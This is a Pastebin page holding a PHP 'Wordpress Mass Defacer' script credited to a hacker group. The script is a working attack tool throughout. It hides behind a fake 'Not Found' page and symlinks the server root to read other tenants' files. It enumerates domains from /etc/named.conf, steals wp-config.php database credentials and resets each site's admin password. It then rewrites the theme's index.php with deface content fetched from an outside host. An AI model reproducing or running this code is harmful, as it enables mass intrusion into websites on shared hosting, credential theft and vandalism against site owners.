API tools faq
paste
Advertisement
t3ll0

[PHP] Joomla Wordpress Mass Defacer

t3ll0
Apr 1st, 2013
3,345
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.14 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //=======================================
  3. // !! Script Decoded Decoder Online !!
  4. // !! http://www.decoder-online.com/ !!
  5. // !! 22-08-2012
  6. //=======================================
  7.  
  8.  
  9. ini_set("display_errors", "0");
  10. set_time_limit(0);
  11. @session_start();
  12. $auth_pass = '7690ee925772d491670de4c86c03da69';
  13. $base_path = dirname(__FILE__).'/';
  14.  
  15. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
  16. if(empty($auth_pass) || (isset($_GET['pass']) && (md5($_GET['pass'])==$auth_pass))) {
  17. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  18. } else {
  19. printLogin();
  20. }
  21. }
  22.  
  23. function printLogin() {
  24. echo '<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr>'.($_SERVER['SERVER_SIGNATURE']?$_SERVER['SERVER_SIGNATURE']:'<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>');exit;
  25. }
  26.  
  27. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  28. $ar0=explode($marqueurDebutLien, $text);
  29. $ar1=explode($marqueurFinLien, $ar0[$i]);
  30. return trim($ar1[0]);
  31. }
  32.  
  33. function randomt() {
  34. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  35. srand((double)microtime()*1000000);
  36. $i = 0;
  37. $pass = '';
  38. while ($i <= 7) {
  39. $num = rand() % 33;
  40. $tmp = substr($chars, $num, 1);
  41. $pass = $pass . $tmp;
  42. $i++;
  43. }
  44. return $pass;
  45. }
  46.  
  47. function index_changer_wp($conf, $content) {
  48. $output = '';
  49. $dol = '$';
  50. $username = entre2v2($conf,"define('DB_USER', '","');");
  51. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
  52. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
  53. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
  54. $host = entre2v2($conf,"define('DB_HOST', '","');");
  55.  
  56. $link=mysql_connect($host,$username,$password);
  57. if($link) {
  58. mysql_select_db($dbname,$link) ;
  59. $dol = '$';
  60. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '".$dol."P".$dol."BpAdo5GPHYYw778chUGOokkzTPnOSP.' WHERE `ID` = 1");
  61. } else {
  62. $output.= "[-] DB Error<br />";
  63. }
  64. if($req1) {
  65.  
  66. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  67. $data = mysql_fetch_array($req);
  68. $site_url=$data["option_value"];
  69.  
  70. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  71. $data = mysql_fetch_array($req);
  72. $template = $data["option_value"];
  73.  
  74. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  75. $data = mysql_fetch_array($req);
  76. $current_theme = $data["option_value"];
  77.  
  78. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  79. $url2=$site_url."/wp-login.php";
  80.  
  81. $ch = curl_init();
  82. curl_setopt($ch, CURLOPT_URL, $url2);
  83. curl_setopt($ch, CURLOPT_POST, 1);
  84. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=3xp1r3_CA123&rememberme=forever&wp-submit=Log In&testcookie=1");
  85. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  86. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  87. curl_setopt($ch, CURLOPT_HEADER, 0);
  88. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  89. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  90. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  91. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  92. $buffer = curl_exec($ch);
  93.  
  94. $pos = strpos($buffer,"action=logout");
  95. if($pos === false) {
  96. $output.= "[-] Login Error<br />";
  97. } else {
  98. $output.= "[+] Login Successful<br />";
  99. }
  100.  
  101. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  102. curl_setopt($ch, CURLOPT_URL, $url2);
  103. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  104. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  105. curl_setopt($ch, CURLOPT_HEADER, 0);
  106. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  107. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  108. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  109. $buffer0 = curl_exec($ch);
  110.  
  111. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  112. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  113.  
  114. if(substr_count($_file,"/index.php") != 0){
  115. $output.= "[+] index.php loaded in Theme Editor<br />";
  116. } else {
  117. $output.= "[-] index.php can not load in Theme Editor<br />";
  118. }
  119.  
  120. $url2=$site_url."/wp-admin/theme-editor.php";
  121. curl_setopt($ch, CURLOPT_URL, $url2);
  122. curl_setopt($ch, CURLOPT_POST, 1);
  123. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$content."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  124. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  125. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  126. curl_setopt($ch, CURLOPT_HEADER, 0);
  127. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  128. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  129. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  130. $buffer = curl_exec($ch);
  131. curl_close($ch);
  132.  
  133. $pos = strpos($buffer,'<div id="message" class="updated">');
  134. $cond = 0;
  135. if($pos === false) {
  136. $output.= "[-] Updating Index.php Error<br />";
  137. } else {
  138. $output.= "[+] Index.php Updated Successfuly<br />";
  139. $cond = 1;
  140. }
  141. } else {
  142. $output.= "[-] DB Error<br />";
  143. }
  144. global $base_path;
  145. unlink($base_path.'COOKIE.txt');
  146. return array('cond'=>$cond, 'output'=>$output);
  147. }
  148.  
  149. function exec_mode_1($def_url) {
  150.  
  151. @mkdir('sym',0777);
  152. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  153. $fp = @fopen ('sym/.htaccess','w');
  154. fwrite($fp, $wr);
  155. @symlink('/','sym/root');
  156. $dominios = @file_get_contents("/etc/named.conf");
  157. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  158. $out[1] = array_unique($out[1]);
  159. $numero_dominios = count($out[1]);
  160. echo "Total domains: $numero_dominios <br><br />";
  161. $def = file_get_contents($def_url);
  162. $def = urlencode($def);
  163. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  164. $output = fopen('defaced.html', 'a+');
  165. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
  166. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
  167. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  168. $j = 1;
  169. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  170. for($i = $st; $i <= $numero_dominios; $i++)
  171. {
  172. $domain = $out[1][$i];
  173. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  174. $infos = @posix_getpwuid($dono_arquivo);
  175.  
  176. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  177.  
  178. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  179.  
  180. if($config02 && preg_match('/DB_NAME/i',$config02)){
  181. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  182. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  183. $res = index_changer_wp($config02, $def);
  184. echo '<td>'.$res['output'].'</td>';
  185. if($res['cond']) {
  186. echo '<td align="center"><span class="green">DEFACED</span></td>';
  187. fwrite($output, 'http://'.$domain."<br>");
  188. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  189. } else {
  190. echo '<td align="center"><span class="red">FAILED</span></td>';
  191. }
  192. echo '</tr>';
  193. }
  194. }
  195. echo '</table>';
  196. echo '<hr/>';
  197. echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).'<br />';
  198. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  199. }
  200.  
  201. echo '<!DOCTYPE html>
  202. <html>
  203. <head>
  204. <title>3xp1r3 Cyber Army</title>
  205. <style type="text/css">
  206. body {color: white; background: #000 url(http://i1157.photobucket.com/albums/p593/ibot_zone/600_600.png) no-repeat 50% 50%;font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
  207. .header {position:fixed;width:100%;top:0;background:#000;}
  208. .footer {position:fixed;width:100%;bottom:0;background:#000;}
  209. input[type="submit"]{background-color:rgba(25,25,25,0.6);font-size: 45px;font-weight:bold;color: red;font-family: Tahoma; border: 1px solid #666666;height:100px;width:250px;}
  210. input[type="submit"]:hover{color:SeaShell;}
  211. input[type="radio"]{margin-top: 0;}
  212. .even {background-color: rgba(25, 25, 25, 0.6);}
  213. .odd {background-color: rgba(102, 102, 102, 0.6);}
  214. a {color:#fff;} a:hover {color:#00BFFF;}
  215. fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
  216. textarea{background: rgba(0,0,0,0.6); color: white;}
  217. .green {color:#00FF00;font-weight:bold;}
  218. .red {color:#FF0000;font-weight:bold;}
  219. .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
  220. </style>
  221. <script type="text/javascript">
  222. function change() {
  223. if(document.getElementById(\'rcd\').checked == true) {
  224. document.getElementById(\'tra\').style.display = \'\';
  225. } else {
  226. document.getElementById(\'tra\').style.display = \'none\';
  227. }
  228. }
  229. function hide() {
  230. document.getElementById(\'tra\').style.display = \'none\';
  231. }
  232. </script>
  233. </head>
  234. <body>
  235. <div class="header">
  236. <h1 style="font-family: cursive;text-align: center;">!....::: 3xp1r3 AK-47 Deface Gun :::...!</h1>
  237. </div>
  238. <div class="footer">
  239. <h3 style="text-align: center;">?? 3xp1r3 Cyber Army. Coded By - Dr3@m3r~1986</h3>
  240. </div>
  241. <div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
  242. <h2 style="color:#0066FF;text-align: center;">Wordpress Mass Defacer Version 2.3</h2>';
  243. if(!isset($_POST['form_action'])){
  244. echo '<div align="center">
  245. <form action="" method="post">
  246. <input type="hidden" name="form_action" value="1">
  247. <input class=submit type="submit" value="!!! FIRE !!!" name="Submit">
  248. </form>
  249. </div>';
  250. }
  251. echo '<div align="center">';
  252. if($_POST['form_action'] == 1) {
  253. exec_mode_1('http://familypride.tk/tfp.htm');
  254. }
  255. echo '</div>
  256. </div>
  257. </body>
  258. </html>';
  259. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!